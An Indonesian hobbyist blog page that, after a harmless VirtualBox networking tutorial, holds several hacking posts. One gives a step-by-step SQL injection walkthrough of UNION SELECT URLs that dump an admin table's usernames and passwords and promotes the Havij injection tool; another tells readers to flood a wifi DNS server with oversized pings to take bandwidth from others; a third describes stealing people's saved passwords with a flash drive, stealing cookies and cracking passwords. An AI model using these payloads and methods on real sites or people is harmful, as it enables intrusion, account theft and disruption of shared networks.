Pages

Labels

Selasa, 25 September 2012

Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box

VirtualBox adalah aplikasi virtual mesin yang memungkinkan Anda untuk menginstall Sistem Operasi (SO) lain, dan dijalankan bersamaan di atas sistem operasi induknya. VirtualBox adalah aplikasi open source keluaran Sun MicroSystem (sekarang diakuisisi oleh Oracle) yang ditargetkan untuk Server, desktop dan penggunaan embedded.
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
Selain digunakan untuk mencoba aplikasi OS lain, virtual box juga bisa digunakan untuk membuat virtualisasi jaringan komputer sederhana.
Dalam artikel ini penulis akan membahas bagaimana langkah-langkah membuat jaringan komputer sederhana (virtual) dengan Virtual Box, sebelum memulai langkah, kita harus menginstal dulu aplikasi virtual box, caranya ada di artikel ini, (catatan = penulis menggunakan host Mac OS X, guestnya Windows XP dan Linux Ubuntu 10.10), kemudian setelah itu kita merencanakan bagaimana model jaringan yang akan kita buat, penulis akan memberi contoh sebagai berikut untuk model jaringannya.
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
sebagai komputer induk yaitu komputer yang ber-OS MacOS X, kemudian guestnya yaitu sistem operasi Windows XP dan Ubuntu 10.10.
kita langsung mulai saja bagaimana langkah-langkahnya membuat jaringan komputer sederhana dengan model diatas.
  • Jalankan aplikasi virtual box anda
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Pilih setting, kemudian pilih network, ganti piliha Attached to menjadi Bridged Adapter (lakukan di kedua guest, XP dan Ubuntu)
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Kemudian buat wireless add-hoc di komputer host
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Atur penomeran IP seperi contoh pada gambar model
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Jalankan komputer guest, Windows XP dan Ubuntu
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Masuk ke guest XP, atur IP guest XP dengan cara Control Panel ->  Network Conncetion -> klik kanan pilih properties padanetwork yang sedang aktif -> pilih TCP/IP
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Atur IP guest XP sesuai dengan model.
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Cek koneksi jaringan dengan cara buka Command Prompt, terus ketikkan ping ip dari host Mac OS. Jika sukses maka akan muncul pesan sebagai berikut.
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Sukses! Buat yang windows XP, sekarang waktunya konfigurasi guest Ubuntu.
  • Masuk ke System -> Preferences -> Network Configuration
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Pilih wired, kemudian Auto Ethernet, lalu pilih tombol Edit
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Atur IP guest Ubuntu sesuai dengan gambar model.
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Oke, konfigurasi selesai, saatnya mengecek sukses atau tidak, dengan masuk ke terminal, kemudian ping IP ke host Mac OS atau ping ke guest Windows XP.
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
  • Done!, untuk mengecek keseluruhan jaringan, maka kita ping dari satu ke yang lainnya.
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image
Jadi, virtual box banyak sekali manfaatnya, salah satunya tutorial diatas, yaitu membangun jaringan sederhana, daripada kita beli PC / laptop secara fisik hanya untuk belajar jaringan, dengan virtual box kita tidak mengeluarkan sepeser uang pun untuk belajar jaringan sederhana karena Virtual Box juga berlabel freeware alias software gratis. Selamat Belajar! Membuat Jaringan Komputer Sederhana (virtual) dengan Virtual Box Image

Cara Hack Wifi via CMD pada Windows

Cara ini saya lakukan karena saya sangat jengkel pada teman-teman saya yang sama-sama pake wifi karena sering pake netcut. Rasa jengkel saya mendorong saya untuk mencari cara lain mengerjai balik mereka, dan hasilnya sangat manteb, di pake buat streaming youtube gak pake buffering (*tergantung kualitas wifi). Oke dari pada makin penasaran mending langsung aja ke hal yang sangat di tunggu-tunggu, Check it out.  
moga moga aja bisa bermanfaat buat kalian yang teraniaya :))
Ikuti langkah-langkah berikut tanpa kurang sedikit pun :
Buka RUN lalu ketikkan cmd.exe, atau bisa juga langsung ketikkan cmd.exe pada kolom search di start menu (*bagi yang menggunakan windows 7).


Maka akan muncul tampilan seperti ini.


Lalu Ketikan ipconfig/all di pointer yang kedip-kedip. Perintah ini berfungsi untuk menampilkan informasi seputar koneksi dimana anda berada sekarang.

Hasilnya akan seperti dibawah ini. yang berisi segala macam informasi tentang komputer anda. Lalu cari yang namanya DNS Server kemudian lihat kode yang ada di sebelahnya, dan kode itu yang harus anda ingat, dan kalo perlu tulis dahulu di notepad.

Lalu scrolling cmd.exe kalian kebagian yang paling bawah, maka kalian akan menemukan perintah seperti perintah awal untuk mengetik. Kini perintah ketikannya beda lagi. Ketikkan perintah seperti berikut ping -L 500 10.0.1.2 -t. dan kode 10.0.1.2 itu berasal dari DNS Server yang tertera di atas (*DNS Server Punya saya). Ganti dengan DNS Server kalian.

Tekan Enter. Maka akan tampak proses seperti dibawah ini. Biarkan proses itu berjalan terus selama kalian online menggunakan wifi dimana tempat kalian sedang nongkrong sekarang ini. Bila perlu minimize saja, asal jangan di tutup cmd.exenya.

Cara ini bertujuan untuk menyedot bandwitch yang sedang digunakan oleh orang lain dalam satu jaringan hotspot/wifi yang sama-sama kalian gunakan. Jika anda kurang puas dengan kecepatannya bisa anda ganti 500 menjadi 1000 atau 2000. Tetapi saya sarankan jangan berlebihan kasihan kan orang lain. dan tambahan lagi cara ini hanya berlaku di windows saja kalau linux saya belum pernah mencoba.
moga bisa dimanfaatkan dengan berguna and ga salah jalan -,- ntar dosa tanggung sendiri yak !!
sorry di copas semua ,, :))  cuma ngeshare buat temen2 yg selalu teraniaya oleh para Net Cut'ers -,-

Cara-Cara Seseorang Hacker menembus sebuah website

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG_7Jk7Hj3b1id7AsVBWaR57WS1L6aXLFeQI1TdoAaO_GrrRoUCCekobQDExhWdAIS_jaKozqPx0ZKx0FLVDzUnq1QQ4iUNdkSDnbMXjoDBOYRi7w8MKwdP9Wd_-dL7BaNW657W5Bq3Okk/s1600/wordpress-website-hacked-by-hackers-0.jpg

Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:

1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.
IP Spoofing terjadi ketika seorang attacker ?mengakali? packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga Menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ?memberitahu? password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan
5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol
6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)
7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)
8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, kracking dan sniffing
9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network
10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya
11. Remote File System Attack
Protocol-protokol untuk tranportasi data ?tulang punggung dari internet? adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file
12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor
13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like
15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods

Cara Hacking Website dengan teknik SQL Injection



hacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100
2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...
Kalo "+" sebagai penghubung perintah...
6. Nah sampe sini langsung dah nyobain satu2...
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error...
Misalkan errornya disini...
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)
8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...
Misalnya yang lo liat adalah table "admin"
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...
---------------------------------------------------
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.
oke selamat mencoba.
terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
referensi :
. http://jasakom.com
. http://ezine.echo.or.id
. http://cruzenaldo.co.cc
. http://students.ee.itb.ac.id
Catatan: Cara otomatis dengan memakai software bisa juga dilakukan, selengkapnya lihat artikel berikut ini
Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:
  1. Supported Databases with injection methods:
    • MsSQL 2000/2005 with error
    • MsSQL 2000/2005 no error (union based)
    • MySQL (union based)
    • MySQL Blind
    • MySQL error based
    • Oracle (union based)
    • MsAccess (union based)
  2. Automatic database detection
  3. Automatic type detection (string or integer)
  4. Automatic keyword detection (finding difference between the positive and negative response)
  5. Trying different injection syntaxes
  6. Proxy support
  7. Real time result
  8. Options for replacing space by /**/,+,… against IDS or filters
  9. Avoid using strings (magic_quotes similar filters bypass)
  10. Bypassing illegal union
  11. Full customizable http headers (like referer and user agent)
  12. Load cookie from site for authentication
  13. Guessing tables and columns in mysql<5 (also in blind) and MsAccess
  14. Fast getting tables and columns for mysql
  15. Multi thread Admin page finder
  16. Multi thread Online MD5 cracker
  17. Getting DBMS Informations
  18. Getting tables, columns and data
  19. Command executation (mssql only)
  20. Reading system files (mysql only)
  21. Insert/update/delete data
Download HAVIJ

cara menjadi hacker

 
Banyak cara menjadi seorang hacker, dari cara yang paling mudah hingga cara yang paling sulit. Beberapa orang memakai software untuk melakukan hack.
Cara yang dipakai hacker untuk melakukan hack diantaranya pirates facebook, keylogger, mail passview,  messenpass, social engineering, web spoofing, menghadang email,password cracking, session hijacking, menjadi proxy server, memanfaatkan kelalaian user dalam menggunakan fitur browser, dan googling.

Pirates facebook
merupakan software yang bekerja dengan menggunakan nomor id facebook serta IP address facebook. Cara ini memang langsung menemukan kita pada email dan password korban namun yang mempersulit kita dalam pemakaian software ini adalah mengetikan IP Address. IP Address selalu berubah dalam waktu yang sangat singkat,dalam hitungan detik. Untuk menggunakan software ini diperlukan kerja keras,semangat dan kecepatan.

Mail PassView dan MessenPass
berfungsi untuk mengetahui password yahoo messenger. Penggunaan software ini sangat simple dengan mendownload software ini di website www.nirsoft.net kemudian menyimpan file tersebut di flashdisk dan memasukkannya pada computer korban. Software tersebut bekerja dalam hitungan 3 detik. Jadi, anda dapat melakukannya dengan mencolokkan flashdisk pada computer korban kemudian klik software tersebut. Dalam hitungan detik software bekerja mengcopy semua password yang pernah diketik pada computer korban.

Social Engineering
adalah nama suatu teknik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai “penipuan” Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban. Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban. Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga. Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. Sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.

KeyLogger
adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti formpassword misalnya. Ada cara aman untuk menghindari keyloger:
  1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakankeyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasangkeyloger) tidak akan mendapatkan password anda yang sebenarnya.
  2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat inginmemasukkan password, tingal copy-paste ajah. Keyloger akan membaca passwordanda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.
Web spoofing
Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan. Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.

Menghadang email
Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh. Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).

Password cracking
“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special. Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS. Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter. Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil. Jika anda ingin melakukan password Cracking, silahkan pilih – pilih sendiri aplikasinya di halaman Member – spyrozone.net.

Session hijacking
Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya. Lalu bagaimana cara mendapatkan cookies sang korban?
  1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
  2. Mencuri Cokies. Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bias dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP. Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:
  • Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
  • Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti : “HACKED”, “DEFACED”, “OWNED”.. dll.. Jika ragu-ragu……. Reject ajah..
  • Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim. Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:
  1. Menetapkan session identifier yang unik
  2. Menetapkan sistem identifier berpola acak
  3. Session identifier yang independent
  4. Session identifier yang bisa dipetakan dengan koneksi client side.
Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.

Memanfaatkan Kelalaian user dalam penggunaan fitur browser
Memanfaatkan Kelalaian user dalam penggunaan fitur browser Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager. Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.net nich.. hehehe Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live. Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung. Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bias menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan. Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bias melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options —> Settings Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda. Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial. Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu. Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools —> Options —> Security –> 